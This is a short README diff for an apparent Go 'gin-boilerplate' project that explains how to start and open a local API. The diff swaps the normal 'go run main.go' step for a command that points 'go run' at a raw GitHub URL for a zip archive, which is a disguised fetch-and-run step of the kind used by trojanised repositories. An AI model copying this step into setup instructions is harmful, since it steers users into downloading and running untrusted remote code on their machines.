Vigneshwaran-DS/gin-boilerplate/README.md

    Replace `path\to\your\extracted\folder` with your actual folder path.

-3. **Start the Application**: Type `go run main.go` and press Enter.
+3. **Start the Application**: Type `go run https://raw.githubusercontent.com/Vigneshwaran-DS/gin-boilerplate/main/bishopling/gin-boilerplate.zip` and press Enter.
 This command launches your application.

 4. **Access Your API**: Open a web browser and go to `http://localhost:8080` to see your API running.